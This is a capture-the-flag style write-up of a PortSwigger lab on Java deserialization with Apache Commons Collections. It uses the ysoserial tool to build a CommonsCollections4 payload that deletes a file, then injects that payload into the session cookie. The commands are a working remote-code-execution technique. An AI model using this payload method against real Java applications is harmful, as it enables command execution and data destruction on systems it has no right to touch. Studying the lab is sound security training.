# Java Apache Commons Desrialization

[Level description](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-java-deserialization-with-apache-commons) - Practitioner


## The hack

We need an external tool [`ysoserial`](https://github.com/frohoff/ysoserial#installation)
to generate an object we can use to inject in the `session` cookie.

The goal is to generate a string such that, upon deserialization, perform the command 
`rm /home/carlos/morale.txt`.


## Walk through

1. Login as `wiener`

2. Bring up the dev console and switch to the `Application` tab

3. Recognize that the url decoded `session` cookie is a base64 encoded string:

    ```
    rO0ABXNyAC9sYWIuYWN0aW9ucy5jb21tb24uc2VyaWFsaXphYmxlLkFjY2Vzc1Rva2VuVXNlchlR/OUSJ6mBAgACTAALYWNjZXNzVG9rZW50ABJMamF2YS9sYW5nL1N0cmluZztMAAh1c2VybmFtZXEAfgABeHB0ACB6ODNlMmVwM2lhMXk1bGhpcWl1d2kwNW9uZ2F2cWtyZnQABndpZW5lcg==
    ```

4. The base64 decoding of the `session` cookie is largely not readable, but it contains:

    ```
    accessTokentLjava/lang/String;username
    ```

5. Get the [`ysoserial`](https://github.com/frohoff/ysoserial#installation) tool:

    ```shell
    $ curl -L "https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar" -o /tmp/ysoserial.jar
    ```

6. Use ysoserial's `CommonsCollections4` to generate a payload that
performs `rm /home/carlos/morale.txt`:

    ```
    $ java -jar /tmp/ysoserial.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
    ```

6. Url encode the output string and use it in the `session` cookie.

8. Use the cookie to access the site. It will remove carlo's morale `/home/carlos/morale.txt`.

Done.
